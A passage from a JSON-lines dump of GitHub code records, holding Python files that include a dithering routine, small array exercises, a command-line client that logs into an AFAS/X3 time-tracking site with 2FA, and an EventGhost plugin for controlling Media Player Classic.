item_name, item_amount in production_option[\"result\"].items():\n self.inventory[item_name] += item_amount\n self.log(\"Producing {} {} from {} at cost {}\".format(item_amount,item_name,building.name,production_option[\"cost\"]))\n \n return None\n\n def log_data(self):\n self.player_inventory_history.append(copy(self.inventory))\n self.player_money_history.append(copy(self.money))\n \n\n\n# ==============================\n# Unit tests\n\ndef test_player_buy():\n players = [Player(player_id=x) for x in range(2)]\n builidng_deck = BuildingDeck()\n \n\n# Bug, inventory goes to negative","repo_name":"maitek/doric_merchants","sub_path":"src/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":6387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14400305043","text":"# -*- encoding: utf-8 -*-\n# Module iadither\n\nfrom numpy import *\n\ndef iadither(f, n):\n import ia636\n\n H,W = f.shape\n D = 1.*array([[0,2],[3,1]])\n d = 1*D\n k = int(log(n/2.)/log(2.))\n for i in range(k):\n u = ones(D.shape)\n d1 = 4*D + d[0,0]*u\n d2 = 4*D + d[0,1]*u\n d3 = 4*D + d[1,0]*u\n d4 = 4*D + d[1,1]*u\n D = concatenate((concatenate((d1,d2),1), concatenate((d3,d4),1)))\n D = (255*abs(D/D.max())).astype('uint8')\n g = tile(D, array(f.shape)//array(D.shape) + array([1,1]))[:H,:W]\n g = ia636.ianormalize(f,[0,255]) >= g\n return g\n\n","repo_name":"MICLab-Unicamp/ia636","sub_path":"ia636/iadither.py","file_name":"iadither.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"31"} +{"seq_id":"25456261451","text":"''' Python program to perform right rotation in array by 2 positions '''\n\n# accepting the size of an array from user\nn = int(input('Array size : '))\n\n# declearing an empty array\na = []\n\n# declearing a variable for no of rotations to be applied\nsr = 2\n\n# loop for inserting the array elements\nfor i in range(0,n):\n \n # inserting the values into an array using appern() function\n a.append(int(input(\"Enter array value : \")))\n\n# displaying the array before right rotation\nprint('Before right rotation : ', a)\n\n# performing shift rotation range from 0 to sr times\nfor i in range(0,sr):\n\n # stroing the last element in the temporary variable\n temp = a[n-1]\n\n # shifting remaining elements toward right side.\n # the array starts with last element i.e, start with n-1 upto 0 and in reverse order -1\n for j in range(n-1, 0, -1):\n\n # shifting the elements\n a[j] = a[j - 1]\n \n # storing the last element to the first index \n a[0] = temp\n\n# displaying the array after right rotation\nprint('After right rotation : ',a)\n","repo_name":"jerinraju868/Python_Backend_Internship","sub_path":"Jan 5/pg_04.py","file_name":"pg_04.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"10661094667","text":"import logging\nimport functools\nimport getpass\nimport json\nimport pickle\nimport warnings\nfrom pathlib import Path\nfrom typing import Dict\n\nfrom appdirs import user_data_dir\nfrom requests_html import HTMLSession\n\nlogger = logging.getLogger(__name__)\nsave_dir = Path(user_data_dir(appname=\"x3cli\"))\nsave_dir.mkdir(exist_ok=True)\nCACHE = Path(save_dir) / \"cache.pkl\"\n\nDEFAULT_HEADERS = {\n \"User-Agent\": \"Mozilla/5.0 (Macintosh; Intel Mac OS; rv:94.0) Gecko/20100101 Firefox/94.0\",\n \"Accept\": \"*/*\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Referer\": \"https://x3.nodum.io/grid\",\n \"DNT\": \"1\",\n \"Connection\": \"keep-alive\",\n}\n\n\ndef login_required(func):\n @functools.wraps(func)\n def wrapper(self, *args, **kwargs):\n if not all([self.employee_id, self.secure, \"NODUMXEBIAURENBOEKEN3\" in self.session.cookies]):\n self.set_from_cache()\n if self.is_authenticated():\n logger.debug(\"You are already logged in\")\n else:\n logger.debug(\"Removing cache\")\n CACHE.unlink(missing_ok=True)\n hint = f\" ({self.username})\" if self.username else \"\"\n username_input = input(f\"Username{hint}: \")\n if username_input:\n self.username = username_input\n password = getpass.getpass()\n logger.debug(f\"Logging you in as {self.username}\")\n self.login(username=self.username, password=password)\n result = func(self, *args, **kwargs)\n return result\n return wrapper\n\n\nclass X3:\n def __init__(self):\n self.session = HTMLSession()\n self.session.headers.update(DEFAULT_HEADERS)\n self.employee_id = None\n self.username = None\n self.name = None\n self.secure = None\n self._is_authenticated = False\n self.set_from_cache()\n\n def is_authenticated(self):\n if not self._is_authenticated:\n url = \"https://37432.afasinsite.nl/x3/timemanagement\"\n response = self.session.get(url)\n if any([\n response.url.startswith(f\"https://{prefix}\")\n for prefix\n in [\"sts.afasonline.com\", \"idp.afasonline.com\"]\n ]): # We are redirected to the login page, so we are logged in\n logger.debug(\"Can't get data, not logged in\")\n self._is_authenticated = False\n else:\n logger.debug(\"You can login!\")\n self._is_authenticated = True\n return self._is_authenticated\n\n def set_from_cache(self):\n if CACHE.exists():\n with open(CACHE, \"rb\") as f:\n cache = pickle.load(f)\n logger.debug(f\"Setting attributes {cache.keys()} from cache\")\n for attr, value in cache.items():\n # if \".\" in attr: # for setting session.cookies\n # attr, subattr = attr.split(\".\")\n # setattr(getattr(self, attr), subattr, value)\n # else:\n setattr(self, attr, value)\n else:\n warnings.warn(\"Cache not found\")\n\n def save_to_cache(self, cache: Dict):\n with open(CACHE, \"wb\") as f:\n pickle.dump(cache, f)\n\n def login(self, username: str, password: str):\n # Insite will redirect us via javascript\n insite_response = self.session.get(\"https://37432.afasinsite.nl/x3/timemanagement\")\n insite_response.raise_for_status()\n\n if not insite_response.url.startswith(\"https://idp.afasonline.com\"):\n raise ValueError(f\"Insite did not redirect to idp.afasonline.com. Actual url: {insite_response.url}\")\n\n # Grab csrf_token from javascript\n csrf_token = insite_response.html.find(\"script\")[0].text.split('\"')[1]\n\n data = {\n \"Username\": username,\n \"Token\": \"\",\n \"Captcha\": \"False\",\n \"Password\": password,\n \"ReturnUrl\": \"\",\n \"__RequestVerificationToken\": csrf_token,\n }\n\n # First, login\n login_response = self.session.post(\n 'https://idp.afasonline.com/Account/Password',\n data=data,\n )\n login_response.raise_for_status()\n\n # Errors can occur when password is wrong or you are sending too many 2FA requests\n errors = login_response.html.find(\"div .validation-summary-errors li\")\n if errors:\n raise Exception(\n f\"{len(errors)} error encountered during login: \"\n f\"{','.join([error.text for error in errors])}\"\n )\n\n # Sometimes, you will be asked for your 2FA code\n if login_response.url.startswith(\"https://idp.afasonline.com/TwoFactor/Confirm\"):\n authentication_code = input(\"Input your 2FA code: \")\n\n data = {\n \"Method\": \"GenericTotp\",\n \"TwoFactorKey\": \"\",\n \"Code\": authentication_code,\n \"__RequestVerificationToken\": csrf_token,\n # UI has a checkbox: Trust Device for 7 days.\n \"TrustedDevice\": True,\n }\n two_factor_response = self.session.post(login_response.url, data=data)\n two_factor_response.raise_for_status()\n if not two_factor_response.url.startswith(\"https://x3.nodum.io\"):\n raise ValueError(f\"Did not redirect to x3.nodum.io. Actual url {two_factor_response.url}, did you enter the correct 2FA code?\")\n\n # Our headers need to pass the X3 cookie\n # We get the cookie by doing a requests to X3 first, then updating the header\n # response = self.session.get('https://x3.nodum.io/grid')\n x3_cookie = self.session.cookies[\"NODUMXEBIAURENBOEKEN3\"]\n self.session.headers.update(\n {\"Cookie\": f\"NODUMXEBIAURENBOEKEN3={x3_cookie}\"}\n )\n\n def parse_js_employee_object(text):\n obj_str = text.split(\"{ \")[-1].split(\" }\")[0]\n\n employee_obj = {}\n for line in obj_str.split(\",\"):\n key, value = line.split(\":\")\n key = key.strip()\n value = value.replace(\"'\", \"\").replace('\"', \"\").strip()\n employee_obj[key] = value\n\n return employee_obj\n\n # Some of your data is saved in a javascript object inside the X3 html\n response = self.session.get(\"https://x3.nodum.io/grid\")\n response.raise_for_status()\n script_text = response.html.find(\"script\")[-3].text\n employee = parse_js_employee_object(script_text)\n self.secure = employee['secure']\n self.employee_id = employee['id']\n\n logger.debug(\"You should be logged in!\")\n\n # TODO: Validate this\n cache = {\n \"employee_id\": self.employee_id,\n \"secure\": self.secure,\n \"session\": self.session,\n \"username\": self.username,\n }\n self.save_to_cache(cache)\n\n @login_required\n def geldig(self, year: int, month: int):\n params = {\n \"employee\": self.employee_id,\n \"secure\": self.secure,\n \"y\": year,\n \"m\": month,\n }\n\n response = self.session.post(\"https://x3.nodum.io/json/geldig\", params=params)\n logger.debug(response, response.url)\n response.raise_for_status()\n if response.json() is None:\n raise ValueError(\"json response is None\")\n if response.text == \"\":\n raise ValueError(\"Response is empty\")\n if len(response.json()['projects']) == 1:\n raise ValueError(\"Only one project found, you are not logged in\")\n return response.json()\n\n @login_required\n def illness(self, month: int, year: int):\n params = {\n \"employee\": self.employee_id,\n \"secure\": self.secure,\n \"y\": year,\n \"m\": month,\n }\n\n response = self.session.post(\"https://x3.nodum.io/json/illness\", params=params)\n response.raise_for_status()\n if response.json() is None:\n raise ValueError(\"json response is None\")\n if response.text == \"\":\n raise ValueError(\"Response is empty\")\n return response.json()\n\n @login_required\n def lines(self, year: int, month: int):\n data = {\n \"moment\": {\"month\": str(month), \"year\": str(year)},\n \"user\": {\n \"name\": self.name,\n \"id\": str(self.employee_id),\n \"secure\": self.secure,\n \"see\": \"false\",\n },\n }\n response = self.session.post(\n \"https://x3.nodum.io/json/fetchlines\",\n files=dict(json=(None, json.dumps(data))),\n )\n response.raise_for_status()\n\n if response.json() is None:\n raise ValueError(\"json response is None\")\n if response.text == \"\":\n raise ValueError(\"Response is empty\")\n\n return response.json()\n","repo_name":"timotk/x3cli","sub_path":"x3cli/x3.py","file_name":"x3.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41101215448","text":"def rev_Arr(a):\n temp=[]\n for i in range((len(a)-1),-1,-1):\n temp.append(a[i]) \n return temp\n \n\nif __name__ == '__main__':\n Arr = list(map(int, input().strip().split(' ')))\n res=rev_Arr(Arr)\n print(res)","repo_name":"subhamrex/Coding_Practice","sub_path":"Python/hackerRank/Array_DS.py","file_name":"Array_DS.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"35116581550","text":"eg.RegisterPlugin(\n name = \"Media Player Classic\",\n author = \"MonsterMagnet\",\n version = \"2.12\",\n kind = \"program\",\n guid = \"{DD75104D-D586-438A-B63D-3AD01A4D4BD3}\",\n createMacrosOnAdd = True,\n description = (\n 'Adds actions to control '\n '
    '\n 'Media Player Classic - Home Cinema.'\n ),\n help = \"\"\"\n For proper functioning of this plugin should be used\n
    \n Media Player Classic - Home Cinema (x86/x64)\n
    version 1.6.3.5818 or later.\n

    There must be selected the option\n
    Use the same player for each media file\n
    in dialogue View/Options.../Player/Open options.\"\"\",\n icon = (\n \"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAhElEQVR42rWRgQqAIAwF\"\n \"fV+++eWr1V6kiM6gQaTVHYehJEdV7bUG18hCInIDQMNhA+L7cQHBETQrBWERDXANjcxm\"\n \"Ee6CyFxd6ArkynZT5l7KK9gFbs3CrGgEPLzM1FonAn9kz59stqhnhdhEwK/j3m0Tgj8K\"\n \"OPmCr4eYpmMaASt3JS44ADcFoxFdcIMPAAAAAElFTkSuQmCC\"\n ),\n url = \"http://www.eventghost.net/forum/viewtopic.php?t=694\"\n)\n#===============================================================================\n\nimport eg\nimport wx\nimport _winreg\nfrom os import environ\nfrom os.path import join, exists, isfile, split, isabs\nfrom subprocess import Popen\nfrom eg.WinApi import SendMessageTimeout, WM_COMMAND\nfrom eg.WinApi.Utils import GetMonitorDimensions\nfrom win32api import EnumDisplayMonitors\nfrom eg.WinApi.Dynamic import PostMessage\nfrom eg.WinApi.Dynamic import CreateEvent, SetEvent, GetWindowLong\nfrom threading import Timer\nfrom win32gui import GetMenu, GetSubMenu, GetMenuItemCount, GetWindowPlacement\nfrom win32gui import GetClassName, GetWindowText, IsWindowVisible, GetWindowRect\nfrom win32gui import GetDlgItem, SendMessage, FindWindow, IsWindow\nfrom copy import deepcopy as cpy\nfrom time import sleep, strftime, gmtime\nfrom winsound import PlaySound, SND_ASYNC\nfrom ctypes import create_unicode_buffer, addressof, windll, c_int, c_buffer, sizeof\nimport wx.grid as gridlib\nfrom eg.WinApi.Dynamic import COPYDATASTRUCT, PCOPYDATASTRUCT, WM_COPYDATA\nfrom ctypes import Structure, cast, wstring_at, c_wchar, c_void_p\nfrom sys import getfilesystemencoding\nFSE = getfilesystemencoding()\nfrom eg.Classes.MainFrame.TreeCtrl import DropTarget as EventDropTarget\n\nGWL_EXSTYLE = -20\nWS_EX_WINDOWEDGE = 0x00000100\nWM_INITMENUPOPUP = 0x0117\nMF_GRAYED = 1\nMF_DISABLED = 2\nMF_CHECKED = 8\nMF_BYPOSITION = 1024\nSYS_VSCROLL_X = wx.SystemSettings.GetMetric(wx.SYS_VSCROLL_X)\nSYS_HSCROLL_Y = wx.SystemSettings.GetMetric(wx.SYS_HSCROLL_Y)\narialInfoString = \"0;-35;0;0;0;700;0;0;0;0;3;2;1;34;Arial\"\nWM_CLOSE = 16\n#===============================================================================\n\ndef Find_MPC():\n mpchc = eg.WindowMatcher(\n u'mpc-hc{*}.exe',\n None,\n u'MediaPlayerClassicW',\n None,\n None,\n None,\n True,\n 0.0,\n 2\n )\n return mpchc()\n#===============================================================================\n\nclass MPC_OSDDATA(Structure):\n _fields_ = [\n (\"nMsgPos\", c_int), #// screen position constant (see OSD_MESSAGEPOS constants)\n (\"nDurationMS\", c_int), #// duration in milliseconds\n (\"strMsg\", c_wchar * 128) #// message to display thought OSD\n ]\nOSDDATA = MPC_OSDDATA()\n#===============================================================================\n\nMPC_LOADSTATE = (\"Closed\", \"Loading\", \"Loaded\", \"Closing\")\n\nMPC_PLAYSTATE = (\"Play\", \"Pause\", \"Stop\", \"Unused\")\n\nCMD_CONNECT = 0x50000000 #Par 1 : MPC window handle (command should be send to this HWnd)\n\nCMD_STATE = 0x50000001 #Par 1 : current state /see MPC_LOADSTATE enum\n\nCMD_PLAYMODE = 0x50000002 #Par 1 : current play mode (see MPC_PLAYSTATE enum)\n\nCMD_NOWPLAYING = 0x50000003 #; // Send after opening a new file\n # // Par 1 : title\n # // Par 2 : author\n # // Par 3 : description\n # // Par 4 : complete filename (path included)\n # // Par 5 : duration in seconds\n\nCMD_LISTSUBTITLETRACKS = 0x50000004 # // List of subtitle tracks\n # // Par 1 : Subtitle track name 0\n # // Par 2 : Subtitle track name 1\n # // ...\n # // Par n : Active subtitle track, -1 if subtitles disabled\n # //\n # // if no subtitle track present, returns -1\n # // if no file loaded, returns -2\n\nCMD_LISTAUDIOTRACKS = 0x50000005 # // List of audio tracks\n # // Par 1 : Audio track name 0\n # // Par 2 : Audio track name 1\n # // ...\n # // Par n : Active audio track\n # //\n # // if no audio track present, returns -1\n # // if no file loaded, returns -2\n\nCMD_PLAYLIST = 0x50000006 # // List of files in the playlist\n # // Par 1 : file path 0\n # // Par 2 : file path 1\n # // ...\n # // Par n : active file, -1 if no active file\n\nCMD_CURRENTPOSITION = 0x50000007\n #Send current playback position in responce\n #of CMD_GETCURRENTPOSITION.\n #Par 1 : current position in seconds\n\n\nCMD_NOTIFYSEEK = 0x50000008\n #Send the current playback position after a jump.\n #(Automatically sent after a seek event).\n #Par 1 : new playback position (in seconds).\n\nCMD_NOTIFYENDOFSTREAM = 0x50000009\n #Notify the end of current playback\n #(Automatically sent).\n #Par 1 : none.\n\n# ==== Commands from host to MPC\n\n# Open new file\n# Par 1 : file path\nCMD_OPENFILE = 0xA0000000\n\n# Stop playback but keep file / playlist\nCMD_STOP = 0xA0000001\n\n# Stop playback and close file / playlist\nCMD_CLOSEFILE = 0xA0000002\n\n# Pause or restart playback\nCMD_PLAYPAUSE = 0xA0000003\n\n# Add a new file to playlist (did not start playing)\n# Par 1 : file path\nCMD_ADDTOPLAYLIST = 0xA0001000\n\n# Remove all files from playlist\nCMD_CLEARPLAYLIST = 0xA0001001\n\n# Start playing playlist\nCMD_STARTPLAYLIST = 0xA0001002\n\nCMD_REMOVEFROMPLAYLIST = 0xA0001003 # TODO\n\n# Cue current file to specific position\n# Par 1 : new position in seconds\nCMD_SETPOSITION = 0xA0002000\n\n# Set the audio delay\n# Par 1 : new audio delay in ms\nCMD_SETAUDIODELAY = 0xA0002001\n\n# Set the subtitle delay\n# Par 1 : new subtitle delay in ms\nCMD_SETSUBTITLEDELAY = 0xA0002002\n\n# Set the active file in the playlist\n# Par 1 : index of the active file -1 for no file selected\n# DOESN'T WORK\nCMD_SETINDEXPLAYLIST = 0xA0002003\n\n# Set the audio track\n# Par 1 : index of the audio track\nCMD_SETAUDIOTRACK = 0xA0002004\n\n# Set the subtitle track\n# Par 1 : index of the subtitle track -1 for disabling subtitles\nCMD_SETSUBTITLETRACK = 0xA0002005\n\n# Ask for a list of the subtitles tracks of the file\n# return a CMD_LISTSUBTITLETRACKS\nCMD_GETSUBTITLETRACKS = 0xA0003000\n\n# Ask for the current playback position\n# see CMD_CURRENTPOSITION.\n# Par 1 : current position in seconds\nCMD_GETCURRENTPOSITION = 0xA0003004\n\n# Jump forward/backward of N seconds\n# Par 1 : seconds (negative values for backward)\nCMD_JUMPOFNSECONDS = 0xA0003005\n\n# Ask for a list of the audio tracks of the file\n# return a CMD_LISTAUDIOTRACKS\nCMD_GETAUDIOTRACKS = 0xA0003001\n\n# Ask for the properties of the current loaded file\n# return a CMD_NOWPLAYING\nCMD_GETNOWPLAYING = 0xA0003002\n\n# Ask for the current playlist\n# return a CMD_PLAYLIST\nCMD_GETPLAYLIST = 0xA0003003\n\n# Toggle FullScreen\nCMD_TOGGLEFULLSCREEN = 0xA0004000\n\n# Jump forward(medium)\nCMD_JUMPFORWARDMED = 0xA0004001\n\n# Jump backward(medium)\nCMD_JUMPBACKWARDMED = 0xA0004002\n\n# Increase Volume\nCMD_INCREASEVOLUME = 0xA0004003\n\n# Decrease volume\nCMD_DECREASEVOLUME = 0xA0004004\n\n# Shader toggle\nCMD_SHADER_TOGGLE = 0xA0004005\n\n# Close App\nCMD_CLOSEAPP = 0xA0004006\n\n# show host defined OSD message string\nCMD_OSDSHOWMESSAGE = 0xA0005000\n#===============================================================================\n\nclass FixedWidth(wx.FontEnumerator):\n\n def __init__(self):\n wx.FontEnumerator.__init__(self)\n self.fontList = []\n\n def OnFacename(self, fontname):\n if not fontname.startswith(\"@\"):\n self.fontList.append(fontname)\n#===============================================================================\n\ndef GetSec(timeStr):\n sec = int(timeStr[-2:])\n min = timeStr[-5:-3]\n hr = timeStr[-8:-6]\n if min:\n sec += 60*int(min)\n if hr:\n sec += 3600*int(hr)\n return sec\n#===============================================================================\n\ndef GetItemList(menu, hWnd):\n SendMessage(hWnd, WM_INITMENUPOPUP, menu, 0) #REFRESH MENU STATE !!!\n itemList = []\n itemName = c_buffer(\"\\000\" * 128)\n count = GetMenuItemCount(menu)\n for i in range(count):\n windll.user32.GetMenuStringA(c_int(menu),\n c_int(i),\n itemName,\n c_int(len(itemName)),\n MF_BYPOSITION)\n menuState = windll.user32.GetMenuState(c_int(menu),\n c_int(i),\n MF_BYPOSITION)\n id = windll.user32.GetMenuItemID(c_int(menu), c_int(i))\n if menuState & (MF_GRAYED|MF_DISABLED):\n continue\n item = itemName.value.replace(\"&\",\"\").split(\"\\t\")[0]\n if item == \"\" and id == 0:\n continue\n checked = bool(menuState & MF_CHECKED)\n if isabs(item):\n if not isfile(item):\n continue\n else:\n item = split(item)[1]\n itemList.append((item, i, checked, id))\n return itemList\n#===============================================================================\n\nclass MenuGrid(gridlib.Grid):\n\n def __init__(self, parent, lngth):\n gridlib.Grid.__init__(self, parent)\n self.SetRowLabelSize(0)\n self.SetColLabelSize(0)\n self.SetDefaultRowSize(16)\n self.SetScrollLineX(1)\n self.SetScrollLineY(1)\n self.EnableEditing(False)\n self.EnableDragColSize(False)\n self.EnableDragRowSize(False)\n self.EnableDragGridSize(False)\n self.EnableGridLines(False)\n self.SetColMinimalAcceptableWidth(8)\n self.CreateGrid(lngth, 3)\n attr = gridlib.GridCellAttr()\n attr.SetAlignment(wx.ALIGN_LEFT, wx.ALIGN_CENTRE)\n self.SetColAttr(1,attr)\n self.SetSelectionMode(gridlib.Grid.wxGridSelectRows)\n self.Bind(gridlib.EVT_GRID_CMD_SELECT_CELL, self.onGridSelectCell, self)\n\n\n def SetBackgroundColour(self, colour):\n self.SetDefaultCellBackgroundColour(colour)\n\n\n def SetForegroundColour(self, colour):\n self.SetDefaultCellTextColour(colour)\n\n\n def SetFont(self, font):\n self.SetDefaultCellFont(font)\n\n\n def GetSelection(self):\n return self.GetSelectedRows()[0]\n\n\n def Set(self, choices):\n oldLen = self.GetNumberRows()\n newLen = len(choices)\n h = self.GetDefaultRowSize()\n if oldLen > newLen:\n self.DeleteRows(0, oldLen-newLen, False)\n elif oldLen < newLen:\n self.AppendRows(newLen-oldLen, False)\n for i in range(len(choices)):\n chr = u\"\\u25a0\" if choices[i][2] else \"\"\n self.SetCellValue(i,0,chr)\n self.SetCellValue(i,1,\" \"+choices[i][0])\n chr = u\"\\u25ba\" if choices[i][3] == -1 else \"\"\n self.SetCellValue(i,2, chr)\n self.SetRowSize(i,h)\n\n\n def onGridSelectCell(self, event):\n row = event.GetRow()\n self.SelectRow(row)\n if not self.IsVisible(row,1):\n self.MakeCellVisible(row,1)\n event.Skip()\n\n\n def MoveCursor(self, step):\n max = self.GetNumberRows()\n sel = self.GetSelectedRows()[0]\n new = sel + step\n if new < 0:\n new += max\n elif new > max-1:\n new -= max\n self.SetGridCursor(new, 1)\n self.SelectRow(new)\n#===============================================================================\n\nclass MyTextDropTarget(EventDropTarget):\n\n def __init__(self, object):\n EventDropTarget.__init__(self, object)\n self.object = object\n\n\n def OnDragOver(self, x, y, dragResult):\n return wx.DragMove\n\n\n def OnData(self, dummyX, dummyY, dragResult):\n if self.GetData() and self.customData.GetDataSize() > 0:\n txt = self.customData.GetData()\n ix, evtList = self.object.GetEvtList()\n flag = True\n for lst in evtList:\n if txt in lst:\n flag = False\n break\n if flag:\n self.object.InsertImageStringItem(len(evtList[ix]), txt, 0)\n self.object.UpdateEvtList(ix, txt)\n else:\n PlaySound('SystemExclamation', SND_ASYNC)\n\n\n def OnLeave(self):\n pass\n#===============================================================================\n\nclass EventListCtrl(wx.ListCtrl):\n\n def __init__(self, parent, id, evtList, ix, plugin):\n width = 205\n wx.ListCtrl.__init__(self, parent, id, style=wx.LC_REPORT |\n wx.LC_NO_HEADER | wx.LC_SINGLE_SEL, size = (width, -1))\n self.parent = parent\n self.id = id\n self.evtList = evtList\n self.ix = ix\n self.plugin = plugin\n self.sel = -1\n self.il = wx.ImageList(16, 16)\n self.il.Add(wx.BitmapFromImage(wx.Image(join(eg.imagesDir, \"event.png\"), wx.BITMAP_TYPE_PNG)))\n self.SetImageList(self.il, wx.IMAGE_LIST_SMALL)\n self.InsertColumn(0, '')\n self.SetColumnWidth(0, width - 5 - SYS_VSCROLL_X)\n self.Bind(wx.EVT_LIST_ITEM_SELECTED, self.OnSelect)\n self.Bind(wx.EVT_SET_FOCUS, self.OnChange)\n self.Bind(wx.EVT_LIST_INSERT_ITEM, self.OnChange)\n self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self.OnChange)\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightClick)\n self.SetToolTipString(self.plugin.text.toolTip)\n\n\n def OnSelect(self, event):\n self.sel = event.GetIndex()\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n event.Skip()\n\n\n def OnChange(self, event):\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n event.Skip()\n\n\n def OnRightClick(self, event):\n if not hasattr(self, \"popupID1\"):\n self.popupID1 = wx.NewId()\n self.popupID2 = wx.NewId()\n self.Bind(wx.EVT_MENU, self.OnDeleteButton, id=self.popupID1)\n self.Bind(wx.EVT_MENU, self.OnDeleteAllButton, id=self.popupID2)\n # make a menu\n menu = wx.Menu()\n # add some items\n menu.Append(self.popupID1, self.plugin.text.popup[0])\n menu.Append(self.popupID2, self.plugin.text.popup[1])\n # Popup the menu. If an item is selected then its handler\n # will be called before PopupMenu returns.\n self.PopupMenu(menu)\n menu.Destroy()\n\n\n def OnDeleteButton(self, event=None):\n self.DeleteItem(self.sel)\n self.evtList[self.ix].pop(self.sel)\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n if event:\n event.Skip()\n\n\n def OnDeleteAllButton(self, event=None):\n self.DeleteAllItems()\n evt = eg.ValueChangedEvent(self.id, value = self)\n wx.PostEvent(self, evt)\n self.evtList[self.ix] = []\n if event:\n event.Skip()\n\n\n def GetEvtList(self):\n return self.ix, self.evtList\n\n\n def UpdateEvtList(self, ix, txt):\n self.evtList[ix].append(txt)\n\n\n def SetItems(self, evtList):\n for i in range(len(evtList)):\n self.InsertImageStringItem(i, evtList[i], 0)\n#===============================================================================\n\nclass GoToFrame(wx.Frame):\n\n def __init__(self):\n wx.Frame.__init__(\n self,\n None,\n -1,\n 'MPCgotoFrame',\n style=wx.STAY_ON_TOP | wx.SIMPLE_BORDER,\n )\n self.GoToCtrl = None\n self.pos = -1\n self.posList = (0,1,3,4,6,7)\n self.gotowin = None\n self.total = None\n self.evtList = [[],[],[],[],[]]\n self.plugin = None\n\n\n def UpdateOSD(self, data=None):\n if data:\n self.GoToCtrl.SetValue(data)\n if self.pos > -1:\n pos = self.pos\n self.GoToCtrl.SetStyle(0, pos, wx.TextAttr(self.fore, self.back, self.fnt))\n self.GoToCtrl.SetStyle(pos, pos+1, wx.TextAttr(self.foreSel, self.backSel, self.fnt))\n self.GoToCtrl.SetStyle(pos+1, 8, wx.TextAttr(self.fore, self.back, self.fnt))\n f = self.fore\n b = self.back\n else:\n self.GoToCtrl.SetStyle(0, 8, wx.TextAttr(self.fore, self.back, self.fnt))\n f = self.foreSel\n b = self.backSel\n self.gotoLbl.SetBackgroundColour(b)\n self.gotoLbl.SetForegroundColour(f)\n self.Refresh()\n\n\n def MoveCursor(self, step):\n max = len(self.posList)-1\n ix = self.posList.index(self.pos)\n ix += step\n if ix > max:\n ix = 0\n elif ix == -1:\n ix = max\n self.pos = self.posList[ix]\n wx.CallAfter(self.UpdateOSD)\n\n\n def Turn(self, step):\n min = 0\n max = 9\n if self.pos == -1:\n self.GoTo()\n return\n pos = self.pos\n data = list(self.GoToCtrl.GetValue())\n value = int(data[pos])\n if pos == 6:\n max = 5\n elif pos == 4 and len(self.posList)==3:\n max = int(self.total[4])\n elif pos == 3:\n max = 5\n if len(self.posList)==4:\n max = int(self.total[3])\n elif pos == 1 and len(self.posList)==5:\n max = int(self.total[1])\n elif pos == 0 and len(self.posList)==6:\n max = int(self.total[0])\n value += step\n if value < min:\n value = max\n elif value > max:\n value = min\n data[pos] = str(value)\n newTime =''.join(data)\n if newTime= 10 hour (no skip)\n self.back = back\n self.fore = fore\n self.foreSel = foreSel\n self.backSel = backSel\n self.flag = flag\n self.evtList = evtList\n for evt in self.evtList[0]:\n eg.Bind(evt, self.onUp)\n for evt in self.evtList[1]:\n eg.Bind(evt, self.onDown)\n for evt in self.evtList[2]:\n eg.Bind(evt, self.onLeft)\n for evt in self.evtList[3]:\n eg.Bind(evt, self.onRight)\n for evt in self.evtList[4]:\n eg.Bind(evt, self.onEscape)\n label = self.plugin.text.gotoLabel\n self.gotoLbl=wx.StaticText(self, -1, label, pos = (5,5))\n self.gotoLbl.SetBackgroundColour(self.back)\n self.gotoLbl.SetForegroundColour(self.fore)\n fnt = self.gotoLbl.GetFont()\n border = fontSize/3\n fnt.SetPointSize(6*fontSize/10)\n fnt.SetWeight(wx.FONTWEIGHT_BOLD)\n self.gotoLbl.SetFont(fnt)\n labelSize = self.gotoLbl.GetTextExtent(label)\n self.gotoLbl.SetSize(labelSize)\n self.gotoLbl.SetPosition((border,border))\n self.GoToCtrl = wx.TextCtrl(\n self,\n -1,\n style=wx.TE_RICH2|wx.NO_BORDER|wx.TE_READONLY|wx.TE_CENTER,\n )\n fnt.SetFaceName(fontFace)\n fnt.SetPointSize(fontSize)\n self.GoToCtrl.SetFont(fnt)\n self.fnt = fnt\n data = \"%s%s\" % (\"00:00:00\"[:8-len(elaps)],elaps)\n gotoSize = self.GoToCtrl.GetTextExtent(data)\n wx.CallAfter(self.UpdateOSD, data)\n if sizeFlag:\n gotoSize = (1.4 * gotoSize[0],gotoSize[1])\n self.GoToCtrl.SetSize(gotoSize)\n self.GoToCtrl.SetPosition((border, 1.5*border+labelSize[1]))\n self.SetSize((4+gotoSize[0]+2*border,2+labelSize[1]+gotoSize[1]+2.5*border))\n self.SetBackgroundColour(self.back)\n self.GoToCtrl.SetBackgroundColour(self.back)\n self.Bind(wx.EVT_CHAR_HOOK, self.onFrameCharHook)\n monDim = GetMonitorDimensions()\n try:\n x,y,ws,hs = monDim[monitor]\n except IndexError:\n x,y,ws,hs = monDim[0]\n width,height = self.GetSizeTuple()\n x_pos = x + (ws - width)/2\n y_pos = y + (hs - height)/2\n self.SetPosition((x_pos,y_pos) )\n self.Show(True)\n self.gotoLbl.SetFocus()\n if self.flag:\n self.timer=MyTimer(t = 5.0, plugin = self.plugin)\n wx.Yield()\n SetEvent(event)\n\n\n def onUp(self, event):\n wx.CallAfter(self.Turn, 1)\n return True #stop processing this event !!!\n\n\n def onDown(self, event):\n wx.CallAfter(self.Turn, -1)\n return True #stop processing this event !!!\n\n\n def onLeft(self, event):\n wx.CallAfter(self.MoveCursor, -1)\n return True #stop processing this event !!!\n\n\n def onRight(self, event):\n wx.CallAfter(self.MoveCursor, 1)\n return True #stop processing 